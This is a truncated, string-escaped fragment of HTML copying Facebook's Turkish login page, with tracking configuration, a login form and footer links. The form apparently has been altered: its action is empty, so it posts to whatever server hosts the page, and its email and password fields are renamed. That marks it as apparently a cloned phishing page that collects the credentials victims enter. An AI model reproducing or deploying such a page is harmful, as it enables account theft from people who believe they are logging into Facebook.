:[\"click\"],\"UFIReactionsLikeLinkImpl\":[\"click\"],\"UFIReactionsLinkImplRoot\":[\"click\"],\"Reaction\":[\"click\"],\"UFIReactionsMenuImpl\":[\"click\"],\"UFIReactionsSpatialReactionIconContainer\":[\"click\"],\"VideoComponentPlayButton\":[\"click\"],\"FeedOptionsPopover\":[\"click\"],\"UFICommentLikeCount\":[\"click\"],\"UFICommentLink\":[\"click\"],\"ChatTabComposerInputContainer\":[\"click\"],\"ChatTabHeader\":[\"click\"],\"DraftEditor\":[\"click\"],\"ChatSideBarDropDown\":[\"click\"],\"SearchBox\":[\"click\"],\"ChatSideBarLink\":[\"mouseup\"],\"MessengerSearchTypeahead\":[\"click\"],\"NotificationListItem\":[\"click\"],\"MessageJewelListItem\":[\"click\"],\"Messages_Jewel_Button\":[\"click\"],\"Notifications_Jewel_Button\":[\"click\"],\"snowliftopen\":[\"click\"],\"NoteTextSeeMoreLink\":[\"click\"],\"fbFeedOptionsPopover\":[\"click\"],\"Requests_Jewel_Button\":[\"click\"],\"UFICommentActionLinkAjaxify\":[\"click\"],\"UFICommentActionLinkRedirect\":[\"click\"],\"UFICommentActionLinkDispatched\":[\"click\"],\"UFICommentCloseButton\":[\"click\"],\"UFICommentActionsRemovePreview\":[\"click\"],\"UFICommentActionsReply\":[\"click\"],\"UFICommentActionsSaleItemMessage\":[\"click\"],\"UFICommentActionsAcceptAnswer\":[\"click\"],\"UFICommentActionsUnacceptAnswer\":[\"click\"],\"UFICommentReactionsLikeLink\":[\"click\"],\"UFICommentMenu\":[\"click\"],\"UFIMentionsInputFallback\":[\"click\"],\"UFIMentionsInputComponent\":[\"click\"],\"UFIMentionsInputProxyInput\":[\"click\"],\"UFIMentionsInputProxyDummy\":[\"click\"],\"UFIPrivateReplyLinkMessage\":[\"click\"],\"UFIPrivateReplyLinkSeeReply\":[\"click\"],\"ChatCloseButton\":[\"click\"],\"ChatTabComposerPhotoUploader\":[\"click\"],\"ChatTabComposerGroupPollingButton\":[\"click\"],\"ChatTabComposerGames\":[\"click\"],\"ChatTabComposerPlan\":[\"click\"],\"ChatTabComposerFileUploader\":[\"click\"],\"ChatTabStickersButton\":[\"click\"],\"ChatTabComposerGifButton\":[\"click\"],\"ChatTabComposerEmojiPicker\":[\"click\"],\"ChatTabComposerLikeButton\":[\"click\"],\"ChatTabComposerP2PButton\":[\"click\"],\"ChatTabComposerQuickCam\":[\"click\"],\"ChatTabHeaderAudioRTCButton\":[\"click\"],\"ChatTabHeaderVideoRTCButton\":[\"click\"],\"ChatTabHeaderOptionsButton\":[\"click\"],\"ChatTabHeaderAddToThreadButton\":[\"click\"],\"ReactComposerMediaSprout\":[\"click\"],\"UFIReactionsBlingSocialSentenceComments\":[\"click\"],\"UFIReactionsBlingSocialSentenceSeens\":[\"click\"],\"UFIReactionsBlingSocialSentenceShares\":[\"click\"],\"UFIReactionsBlingSocialSentenceViews\":[\"click\"],\"UFIReactionsBlingSocialSentence\":[\"click\"],\"UFIReactionsSocialSentence\":[\"click\"],\"VideoFullscreenButton\":[\"click\"],\"Tahoe\":[\"click\"],\"TahoeFromVideoPlayer\":[\"click\"],\"TahoeFromVideoLink\":[\"click\"],\"TahoeFromPhoto\":[\"click\"],\"\":[\"click\"],\"FBStoryTrayItem\":[\"click\"],\"Mobile_Feed_Jewel_Button\":[\"click\"],\"Mobile_Requests_Jewel_Button\":[\"click\"],\"Mobile_Messages_Jewel_Button\":[\"click\"],\"Mobile_Notifications_Jewel_Button\":[\"click\"],\"Mobile_Search_Jewel_Button\":[\"click\"],\"Mobile_Bookmarks_Jewel_Button\":[\"click\"],\"Mobile_Feed_UFI_Comment_Button_Permalink\":[\"click\"],\"Mobile_Feed_UFI_Comment_Button_Flyout\":[\"click\"],\"Mobile_Feed_UFI_Token_Bar_Flyout\":[\"click\"],\"Mobile_Feed_UFI_Token_Bar_Permalink\":[\"click\"],\"Mobile_UFI_Share_Button\":[\"click\"],\"Mobile_Feed_Photo_Permalink\":[\"click\"],\"Mobile_Feed_Video_Permalink\":[\"click\"],\"Mobile_Feed_Profile_Permalink\":[\"click\"],\"Mobile_Feed_Story_Permalink\":[\"click\"],\"Mobile_Feed_Page_Permalink\":[\"click\"],\"Mobile_Feed_Group_Permalink\":[\"click\"],\"Mobile_Feed_Event_Permalink\":[\"click\"],\"ProfileIntroCardAddFeaturedMedia\":[\"click\"],\"ProfileSectionAbout\":[\"click\"],\"ProfileSectionAllRelationships\":[\"click\"],\"ProfileSectionAtWork\":[\"click\"],\"ProfileSectionContactBasic\":[\"click\"],\"ProfileSectionEducation\":[\"click\"],\"ProfileSectionOverview\":[\"click\"],\"ProfileSectionPlaces\":[\"click\"],\"ProfileSectionYearOverviews\":[\"click\"],\"IntlPolyglotHomepage\":[\"click\"],\"ProtonElementSelection\":[\"click\"]},\"manual_instrumentation\":true,\"profile_eager_execution\":true,\"disable_heuristic\":true,\"disable_event_profiler\":false},1726],[\"AdsInterfacesSessionConfig\",[],{},2393],[\"TimeSliceInteractionSV\",[],{\"on_demand_reference_counting\":true,\"on_demand_profiling_counters\":true,\"default_rate\":1000,\"lite_default_rate\":100,\"interaction_to_lite_coinflip\":{\"ADS_INTERFACES_INTERACTION\":0,\"ads_perf_scenario\":0,\"ads_wait_time\":0,\"Event\":1,\"video_psr\":0,\"video_stall\":0},\"interaction_to_coinflip\":{\"ADS_INTERFACES_INTERACTION\":1,\"ads_perf_scenario\":1,\"ads_wait_time\":1,\"video_psr\":1000000,\"video_stall\":2500000,\"Event\":100,\"cms_editor\":1,\"pixelcloud_view_performance\":25,\"intern_notify_inbox_page_load\":10,\"intern_notify_jewel_list_load\":10,\"tasks_initial_page_load\":1,\"watch_carousel_left_scroll\":1,\"watch_carousel_right_scroll\":1,\"watch_sections_load_more\":1,\"watch_discover_scroll\":1,\"fbpkg_ui\":1,\"sevmanager_powersearch_initial_page_load\":10,\"network_ui\":1,\"daiquery_interactive_query\":1},\"enable_heartbeat\":true,\"maxBlockMergeDuration\":0,\"maxBlockMergeDistance\":0,\"enable_banzai_stream\":true,\"user_timing_coinflip\":50,\"banzai_stream_coinflip\":1,\"compression_enabled\":true,\"ref_counting_fix\":false,\"ref_counting_cont_fix\":false,\"also_record_new_timeslice_format\":false,\"force_async_request_tracing_on\":false},2609],[\"BanzaiConfig\",[],{\"EXPIRY\":86400000,\"MAX_SIZE\":10000,\"MAX_WAIT\":150000,\"RESTORE_WAIT\":150000,\"blacklist\":[\"time_spent\"],\"gks\":{\"boosted_component\":true,\"boosted_pagelikes\":true,\"jslogger\":true,\"mercury_send_error_logging\":true,\"platform_oauth_client_events\":true,\"xtrackable_clientview_batch\":true,\"visibility_tracking\":true,\"graphexplorer\":true,\"gqls_web_logging\":true,\"sticker_search_ranking\":true}},7],[\"cr:925100\",[\"RunBlue\"],{\"__rc\":[\"RunBlue\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:692209\",[\"cancelIdleCallbackBlue\"],{\"__rc\":[\"cancelIdleCallbackBlue\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1]]);new (require(\"ServerJS\"))().handle({\"require\":[[\"markJSEnabled\"],[\"lowerDomain\"],[\"URLFragmentPrelude\"],[\"Primer\"],[\"BigPipe\"],[\"Bootloader\"],[\"TimeSlice\"],[\"ArtilleryOnUntilOffLogging\",\"disable\",[],[]],[\"AsyncRequest\"],[\"BanzaiODS\"],[\"BanzaiScuba\"],[\"VisualCompletionGating\"],[\"FbtLogging\"],[\"Bootloader\",\"markComponentsAsImmediate\",[],[[\"AsyncRequest\",\"BanzaiODS\",\"BanzaiScuba\",\"VisualCompletionGating\",\"FbtLogging\"]]]]});}, \"ServerJS define\", {\"root\":true})();</script></head><body class=\"login_page _39il UIPage_LoggedOut _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_tr_TR\" dir=\"ltr\"><script>requireLazy([\"bootstrapWebSession\"],function(j){j(1588164812)})</script><div class=\"_li\" id=\"u_0_2\"><div class=\"_3_s0 _1toe _3_s1 _3_s1 uiBoxGray noborder\" data-testid=\"ax-navigation-menubar\" id=\"u_0_3\"><div class=\"_608m\"><div class=\"clearfix _ikh _tb6\"><div class=\"_4bl7\"><span class=\"mrm _3bcv _50f3\">Git</span></div><div class=\"_4bl9 _3bcp\"><div class=\"_6a _608n\" aria-label=\"Gezinme Asistan&#x131;\" role=\"menubar\" id=\"u_0_4\"><div class=\"_6a uiPopover\" id=\"u_0_5\"><a role=\"button\" class=\"_42ft _4jy0 _55pi _2agf _4o_4 _63xb _p _4jy3 _517h _51sy\" href=\"#\" style=\"max-width:200px;\" aria-haspopup=\"true\" aria-expanded=\"false\" rel=\"toggle\" id=\"u_0_6\"><span class=\"_55pe\">Bu sayfanın kısımları</span><span class=\"_4o_3 _3-99\"><i class=\"img sp_CFhzeuTBkdE sx_2ea917\"></i></span></a></div><div class=\"_6a _3bcs\"></div><div class=\"_6a mrm uiPopover\" id=\"u_0_7\"><a role=\"button\" class=\"_42ft _4jy0 _55pi _2agf _4o_4 _3_s2 _63xb _p _4jy3 _4jy1 selected _51sy\" href=\"#\" style=\"max-width:200px;\" aria-haspopup=\"true\" tabindex=\"-1\" aria-expanded=\"false\" rel=\"toggle\" id=\"u_0_8\"><span class=\"_55pe\">Erişilebilirlik Yardımı</span><span class=\"_4o_3 _3-99\"><i class=\"img sp_CFhzeuTBkdE sx_d8579c\"></i></span></a></div></div></div></div></div></div><div id=\"pagelet_bluebar\" data-referrer=\"pagelet_bluebar\"><div id=\"blueBarDOMInspector\"><div class=\"_53jh\"><div class=\"loggedout_menubar_container\"><div class=\"clearfix loggedout_menubar\"><div class=\"lfloat _ohe\"><h1><a href=\"https://tr-tr.facebook.com/\" title=\"Facebook Ana Sayfas&#x131;na Git\"><i class=\"fb_logo img sp_0eOQhLgQG2U sx_fbcf0b\"><u>Facebook</u></i></a></h1></div></div></div><div class=\"signupBanner\"><div class=\"signup_bar_container\"><div class=\"signup_box clearfix\"><span class=\"signup_box_content\"><a role=\"button\" class=\"_42ft _4jy0 signup_btn _4jy4 _4jy2 selected _51sy\" href=\"/r.php?locale=tr_TR\">Yeni Hesap Oluştur</a></span></div></div></div></div></div></div><div id=\"globalContainer\" class=\"uiContextualLayerParent\"><div class=\"fb_content clearfix \" id=\"content\" role=\"main\"><div class=\"_4-u5 _30ny\"><span class=\"muffin_tracking_pixel_start\"></span><img class=\"tracking_pixel\" /><span class=\"muffin_tracking_pixel_end\"></span><div class=\"_4-u2 _1w1t _4-u8 _52jv\"><div class=\"_xku\" id=\"header_block\"><span class=\"_50f6\">Facebook&#039;a Giriş Yap</span></div><div class=\"login_form_container\">\r\n\r\n\r\n\t<form action=\"\" method=\"post\"><input type=\"hidden\" name=\"jazoest\" value=\"2760\" autocomplete=\"off\" /><input type=\"hidden\" name=\"lsd\" value=\"AVqWAjtz\" autocomplete=\"off\" /><input type=\"hidden\" autocomplete=\"off\" id=\"error_box\" /><div id=\"loginform\"><input type=\"hidden\" autocomplete=\"off\" id=\"display\" name=\"display\" value=\"\" /><input type=\"hidden\" autocomplete=\"off\" id=\"enable_profile_selector\" name=\"enable_profile_selector\" value=\"\" /><input type=\"hidden\" autocomplete=\"off\" id=\"isprivate\" name=\"isprivate\" value=\"\" /><input type=\"hidden\" autocomplete=\"off\" id=\"legacy_return\" name=\"legacy_return\" value=\"0\" /><input type=\"hidden\" autocomplete=\"off\" id=\"profile_selector_ids\" name=\"profile_selector_ids\" value=\"\" /><input type=\"hidden\" autocomplete=\"off\" id=\"return_session\" name=\"return_session\" value=\"\" /><input type=\"hidden\" autocomplete=\"off\" id=\"skip_api_login\" name=\"skip_api_login\" value=\"\" /><input type=\"hidden\" autocomplete=\"off\" id=\"signed_next\" name=\"signed_next\" value=\"\" /><input type=\"hidden\" autocomplete=\"off\" id=\"trynum\" name=\"trynum\" value=\"1\" /><input type=\"hidden\" autocomplete=\"off\" name=\"timezone\" value=\"\" id=\"u_0_9\" /><input type=\"hidden\" autocomplete=\"off\" name=\"lgndim\" value=\"\" id=\"u_0_a\" /><input type=\"hidden\" name=\"lgnrnd\" value=\"055332_aacF\" /><input type=\"hidden\" id=\"lgnjs\" name=\"lgnjs\" value=\"n\" /><div class=\"clearfix _5466 _44mg\" id=\"email_container\">\r\n\r\n\t\t<input type=\"text\" class=\"inputtext _55r1 inputtext _1kbt inputtext _1kbt\" name=\"emails\" tabindex=\"0\" placeholder=\"E-posta veya Telefon Numaras&#x131;\"/>\r\n\r\n\r\n\t</div><div class=\"clearfix _5466 _44mg\">\r\n\r\n\t\t<input type=\"password\" class=\"inputtext _55r1 inputtext _1kbt inputtext _1kbt\" name=\"passwd\" placeholder=\"Şifre\" /></div><div class=\"_xkt \">\r\n\r\n\r\n\t\t\t<button value=\"1\" class=\"_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy\" id=\"loginbutton\" name=\"login\" tabindex=\"0\" type=\"submit\">Giriş Yap</button></div><div class=\"_xkv fsm fwn fcg\" id=\"login_link\"><a href=\"https://www.facebook.com/recover/initiate/?ars=facebook_login\" id=\"forgot-password-link\" target=\"\">Hesabını mı unuttun?</a><span role=\"presentation\" aria-hidden=\"true\"> · </span><a href=\"/r.php?locale=tr_TR&amp;display=page\" rel=\"nofollow\" id=\"reg-link\">Facebook&#039;a Kaydol</a></div></div><input type=\"hidden\" autocomplete=\"off\" id=\"prefill_contact_point\" name=\"prefill_contact_point\" value=\"\" /><input type=\"hidden\" autocomplete=\"off\" id=\"prefill_source\" name=\"prefill_source\" /><input type=\"hidden\" autocomplete=\"off\" id=\"prefill_type\" name=\"prefill_type\" /><input type=\"hidden\" autocomplete=\"off\" id=\"first_prefill_source\" name=\"first_prefill_source\" /><input type=\"hidden\" autocomplete=\"off\" id=\"first_prefill_type\" name=\"first_prefill_type\" /><input type=\"hidden\" autocomplete=\"off\" id=\"had_cp_prefilled\" name=\"had_cp_prefilled\" value=\"false\" /><input type=\"hidden\" autocomplete=\"off\" id=\"had_password_prefilled\" name=\"had_password_prefilled\" value=\"false\" /><input type=\"hidden\" autocomplete=\"off\" name=\"ab_test_data\" value=\"\" /></form>\r\n\r\n\r\n\r\n\r\n</div></div></div></div><div><div id=\"pageFooter\" data-referrer=\"page_footer\" data-testid=\"page_footer\"><ul class=\"uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i\" data-nocookies=\"1\"><li>Türkçe</li><li><a class=\"_sv4\" dir=\"ltr\" href=\"https://ku-tr.facebook.com/login/\" onclick=\"require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ku_TR&quot;, &quot;tr_TR&quot;, &quot;https:\\/\\/ku-tr.facebook.com\\/login\\/&quot;, &quot;www_list_selector&quot;, 0); return false;\" title=\"Kurdish (Kurmanji)\">Kurdî (Kurmancî)</a></li><li><a class=\"_sv4\" dir=\"rtl\" href=\"https://ar-ar.facebook.com/login/\" onclick=\"require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;tr_TR&quot;, &quot;https:\\/\\/ar-ar.facebook.com\\/login\\/&quot;, &quot;www_list_selector&quot;, 1); return false;\" title=\"Arabic\">العربية</a></li><li><a class=\"_sv4\" dir=\"ltr\" href=\"https://en-gb.facebook.com/login/\" onclick=\"require(&quot;IntlUtils&quot;).setCookieLocale(&quot;en_GB&quot;, &quot;tr_TR&quot;, &quot;https:\\/\\/en-gb.facebook.com\\/login\\/&quot;, &quot;www_list_selector&quot;, 2); return false;\" title=\"English (UK)\">English (UK)</a></li><li><a class=\"_sv4\" dir=\"ltr\" href=\"https://zz-tr.facebook.com/login/\" onclick=\"require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zz_TR&quot;, &quot;tr_TR&quot;, &quot;https:\\/\\/zz-tr.facebook.com\\/login\\/&quot;, &quot;www_list_selector&quot;, 3); return false;\" title=\"Zaza\">Zaza</a></li><li><a class=\"_sv4\" dir=\"ltr\" href=\"https://de-de.facebook.com/login/\" onclick=\"require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;tr_TR&quot;, &quot;https:\\/\\/de-de.facebook.com\\/login\\/&quot;, &quot;www_list_selector&quot;, 4); return false;\" title=\"German\">Deutsch</a></li><li><a class=\"_sv4\" dir=\"ltr\" href=\"https://ru-ru.facebook.com/login/\" onclick=\"require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ru_RU&quot;, &quot;tr_TR&quot;, &quot;https:\\/\\/ru-ru.facebook.com\\/login\\/&quot;, &quot;www_list_selector&quot;, 5); return false;\" title=\"Russian\">Русский</a></li><li><a class=\"_sv4\" dir=\"ltr\" href=\"https://fr-fr.facebook.com/login/\" onclick=\"require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;tr_TR&quot;, &quot;https:\\/\\/fr-fr.facebook.com\\/login\\/&quot;, &quot;www_list_selector&quot;, 6); return false;\" title=\"French (France)\">Français (France)</a></li><li><a class=\"_sv4\" dir=\"rtl\" href=\"https://fa-ir.facebook.com/login/\" onclick=\"require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fa_IR&quot;, &quot;tr_TR&quot;, &quot;https:\\/\\/fa-ir.facebook.com\\/login\\/&quot;, &quot;www_list_selector&quot;, 7); return false;\" title=\"Persian\">فارسی</a></li><li><a class=\"_sv4\" dir=\"ltr\" href=\"https://es-la.facebook.com/login/\" onclick=\"require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;tr_TR&quot;, &quot;https:\\/\\/es-la.facebook.com\\/login\\/&quot;, &quot;www_list_selector&quot;, 8); return false;\" title=\"Spanish\">Español</a></li><li><a class=\"_sv4\" dir=\"ltr\" href=\"https://pt-br.facebook.com/login/\" onclick=\"require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_BR&quot;, &quot;tr_TR&quot;, &quot;https:\\/\\/pt-br.facebook.com\\/login\\/&quot;, &quot;www_list_selector&quot;, 9); return false;\" title=\"Portuguese (Brazil)\">Português (Brasil)</a></li><li><a role=\"button\" class=\"_42ft _4jy0 _517i _517h _51sy\" rel=\"dialog\" ajaxify=\"/settings/language/language/?uri=https%3A%2F%2Fpt-br.facebook.com%2Flogin%2F&amp;source=www_list_selector_more\" href=\"#\" title=\"Daha fazla dil g&#xf6;ster\"><i class=\"img sp_Ke6ZUJH-N4S sx_930120\"></i></a></li></ul><div id=\"contentCurve\"></div><div id=\"pageFooterChildren\" role=\"contentinfo\" aria-label=\"Facebook site ba&#x11f;lant&#x131;lar&#x131;\"><ul class=\"uiList pageFooterLinkList _509- _4ki _703 _6-i\"><li><a href=\"/r.php\" title=\"Facebook&#039;a Kaydol\">Kaydol</a></li><li><a href=\"/login/\" title=\"Facebook&#039;a Giri&#x15f; Yap\">Giriş Yap</a></li><li><a href=\"https://tr-tr.messenger.com/\" title=\"Messenger&#039;a g&#xf6;z at.\">Messenger</a></li><li><a href=\"/lite/\" title=\"Android i&#xe7;in Facebook Lite.\">Facebook Lite</a></li><li><a href=\"https://tr-tr.facebook.com/watch/\" title=\"Watch videolar&#x131;m&#x131;za g&#xf6;z at.\"> Watch </a></li><li><a href=\"/directory/people/\" title=\"Ki&#x15f;iler rehberimize g&#xf6;z at.\">Kişiler</a></li><li><a href=\"/directory/pages/\" title=\"Sayfalar rehberimize g&#xf6;z at.\">Sayfalar</a></li><li><a href=\"/pages/category/\">Sayfa Kategorileri</a></li><li><a href=\"/places/\" title=\"Facebook&#039;taki pop&#xfc;ler yerlere g&#xf6;z at.\">Yerler</a></li><li><a href=\"/games/\" title=\"Facebook oyunlar&#x131;na g&#xf6;z at.\">Oyunlar</a></li><li><a href=\"/directory/places/\" title=\"Yerler rehberimize g&#xf6;z at.\">Konumlar</a></li><li><a href=\"/marketplace/\" title=\"Facebook Marketplace&#039;te al&#x131;m sat&#x131;m yap.\">Marketplace</a></li><li><a href=\"/directory/groups/\" title=\"Gruplar dizinimize g&#xf6;z at.\">Gruplar</a></li><li><a href=\"https://l.facebook.com/l.php?u=https%3A%2F%2Finstagram.com%2F&amp;h=AT1yLa22NRmrRuwlNNzFX-bksoJYQ2RiMsvJWwxt-KBo8xrAJESveAN-rghAf00UjIffEwvaOU3TpP6K_nhg_n0TpCjTX6RTGSk2mA7bRxoMI3wn27Dc7OTQHnEB7-xzotMrSpszt8hYyRfutIyn\" title=\"Instagram&#039;a g&#xf6;z at\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Instagram</a></li><li><a href=\"/local/lists/245019872666104/\" title=\"Yerel Listeler rehberimize g&#xf6;z at.\">Yerel</a></li><li><a href=\"/fundraisers/\" title=\"&#xd6;nemli ortak hedeflere ba&#x11f;&#x131;&#x15f;ta bulun.\">Bağış Kampanyaları</a></li><li><a href=\"/biz/directory/\" title=\"Facebook Hizmetleri rehberimize g&#xf6;z at.\">Hizmetler</a></li><li><a href=\"/facebook\" accesskey=\"8\" title=\"Blogumuzu oku, kaynak merkezini ke&#x15f;fet ve i&#x15f; f&#x131;rsatlar&#x131; bul.\">Hakkımızda</a></li><li><a href=\"/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto\" title=\"Facebook&#039;ta reklam ver.\">Reklam Oluştur</a></li><li><a href=\"/pages/create/?ref_type=site_footer\" title=\"Bir Sayfa olu&#x15f;tur.\">Sayfa Oluştur</a></li><li><a href=\"https://developers.facebook.com/?ref=pf\" title=\"Platformumuzda uygulamalar geli&#x15f;tir.\">Geliştiriciler</a></li><li><a href=\"/careers/?ref=pf\" title=\"Kariyerine m&#xfc;thi&#x15f; &#x15f;irketimizde devam et.\">Kariyer Olanakları</a></li><li><a data-nocookies=\"1\" href=\"/privacy/explanation\" title=\"Gizlili&#x11f;in ve Facebook hakk&#x131;nda bilgi al.\">Gizlilik</a></li><li><a href=\"/policies/cookies/\" title=\"&#xc7;erezler ve Facebook hakk&#x131;nda daha fazla bilgi al.\" data-nocookies=\"1\">Çerezler</a></li><li><a class=\"_41ug\" data-nocookies=\"1\" href=\"https://tr-tr.facebook.com/help/568137493302217\" title=\"Ad Choices hakk&#x131;nda bilgi al&#x131;n.\">Ad Choices<i class=\"img sp_0eOQhLgQG2U sx_7cd432\"></i></a></li><li><a data-nocookies=\"1\" href=\"/policies?ref=pf\" accesskey=\"9\" title=\"Ko&#x15f;ul ve ilkelerimizi g&#xf6;zden ge&#xe7;ir.\">Koşullar</a></li><li><a href=\"/help/?ref=pf\" accesskey=\"0\" title=\"Yard&#x131;m Merkezimizi ziyaret et.\">Yardım</a></li><li><a accesskey=\"6\" class=\"accessible_elem\" href=\"/settings\" title=\"Facebook ayarlar&#x131;n&#x131; g&#xf6;r ve d&#xfc;zenle.\">Ayarlar</a></li><li><a accesskey=\"7\" class=\"accessible_elem\" href=\"/allactivity?privacy_source=activity_log_top_menu\" title=\"Hareketler d&#xf6;k&#xfc;m&#xfc;n&#xfc; g&#xf6;r\">Hareketler Dökümü</a></li></ul></div><div class=\"mvl copyright\"><div><span> Facebook © 2020</span></div></div></div></div></div><div></div><span><img src=\"https://facebook.com/security/hsts-pixel.gif\" width=\"0\" height=\"0\" style=\"display:none\" /></span></div><div style=\"display:none\"><div></div><div></div><div></div></div><script type=\"text/javascript\">/*<![CDATA[*/(function(){function si_cj(m){setTimeout(function(){new Image().src=\"https:\\/\\/error.facebook.com\\/common\\/scribe_endpoint.php?c=si_clickjacking&t=3974\"+\"&m=\"+m;},5000);}if(top!=self){try{if(parent!=top){throw 1;}var si_cj_d=[\"apps.facebook.com\",\"apps.beta.facebook.com\"];var href=top.location.href.toLowerCase();for(var i=0;i<si_cj_d.length;i++){if (href.indexOf(si_cj_d[i])>=0){throw 1;}}si_cj(\"3 \");}catch(e){si_cj(\"1 \\t\");window.document.write(\"\\u003Cstyle>body * {display:none !important;}\\u003C\\/style>\\u003Ca href=\\\"#\\\" onclick=\\\"top.location.href=window.location.href\\\" style=\\\"display:block !important;padding:10px\\\">Facebook.com&#039;a git\\u003C\\/a>\");/*donrvnA9*/}}}())/*]]>*/</script>\r\n<script>requireLazy([\"bx\"],function(bx){bx.add({\"875231\":{\"uri\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/yD\\/r\\/d4ZIVX-5C-b.ico\"}});});\r\nrequireLazy([\"gkx\"],function(gkx){gkx.add({\"677762\":{\"result\":false,\"hash\":\"AT71yw0lYQRBFebJ\"},\"1243461\":{\"result\":false,\"hash\":\"AT6axjpA_FmsWBtj\"},\"819236\":{\"result\":false,\"hash\":\"AT6zxd3FhkfqmskZ\"},\"729630\":{\"result\":false,\"hash\":\"AT6aw6sq4t41pR0w\"},\"729631\":{\"result\":false,\"hash\":\"AT6M_GMj-I8MCCla\"},\"1281505\":{\"result\":false,\"hash\":\"AT4SAFRtFn_0AM1z\"},\"1291023\":{\"result\":false,\"hash\":\"AT41ICkO0R_gc4kV\"},\"1294182\":{\"result\":false,\"hash\":\"AT6x44jJpt_eIF1_\"},\"1334669\":{\"result\":false,\"hash\":\"AT5jOOmMKo48YkTe\"},\"1381768\":{\"result\":true,\"hash\":\"AT7zj9pJzt7Cufc5\"},\"1399218\":{\"result\":false,\"hash\":\"AT4p_Zs2ujIMQw_Q\"},\"1401060\":{\"result\":true,\"hash\":\"AT7yHoF1AFxy7Gjh\"},\"1405113\":{\"result\":true,\"hash\":\"AT7SCqetWxOhY14b\"},\"1099893\":{\"result\":false,\"hash\":\"AT4hk5D8CmsdCuYh\"}});});\r\nrequireLazy([\"Bootloader\"],function(Bootloader){Bootloader.setResourceMap({\"wD\\/gW\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iO6E4\\/yq\\/l\\/tr_TR\\/wO4JwUPV02g.js?_nc_x=Ij3Wp8lg5Kz\"},\"zRC0t\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iqG24\\/y6\\/l\\/tr_TR\\/Y5MJz1qNV1f.js?_nc_x=Ij3Wp8lg5Kz\"},\"Y\\/QGS\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3i1lp4\\/yp\\/l\\/tr_TR\\/66wIGzLXFU3.js?_nc_x=Ij3Wp8lg5Kz\"},\"noiaH\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yJ\\/r\\/WUAmvD-IgcE.js?_nc_x=Ij3Wp8lg5Kz\"},\"QdjhQ\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3icLf4\\/yU\\/l\\/tr_TR\\/BMw4MisoxIv.js?_nc_x=Ij3Wp8lg5Kz\"},\"1VK2G\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iuLM4\\/y3\\/l\\/tr_TR\\/pXjWVmvvEJ6.js?_nc_x=Ij3Wp8lg5Kz\"},\"gz7O1\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yT\\/r\\/-5cJoz28bpD.js?_nc_x=Ij3Wp8lg5Kz\"},\"9+h1k\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iI9d4\\/yc\\/l\\/tr_TR\\/s6w-S7ZwlDH.js?_nc_x=Ij3Wp8lg5Kz\"},\"Uy48b\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3i5qr4\\/yT\\/l\\/tr_TR\\/f1fxDXQvfWA.js?_nc_x=Ij3Wp8lg5Kz\"},\"WjCNT\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yr\\/r\\/s4ymFYb29Ll.js?_nc_x=Ij3Wp8lg5Kz\"},\"xFtHU\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iPsy4\\/yW\\/l\\/tr_TR\\/tNzdjFiDBcG.js?_nc_x=Ij3Wp8lg5Kz\"},\"6tDBW\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3izF64\\/y2\\/l\\/tr_TR\\/5hnF14gUQDB.js?_nc_x=Ij3Wp8lg5Kz\"},\"uuvPl\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3izV54\\/yV\\/l\\/tr_TR\\/vIL_yAj7idN.js?_nc_x=Ij3Wp8lg5Kz\"},\"yApUt\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yX\\/r\\/JUoNf5axiuE.js?_nc_x=Ij3Wp8lg5Kz\"},\"K3Fcz\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iNNj4\\/yX\\/l\\/tr_TR\\/trYTmJHXSdW.js?_nc_x=Ij3Wp8lg5Kz\"},\"8ELCB\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/ye\\/r\\/VRzSVH5iU-V.js?_nc_x=Ij3Wp8lg5Kz\"},\"+ClWy\":{\"type\":\"js\",\"src\":\"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\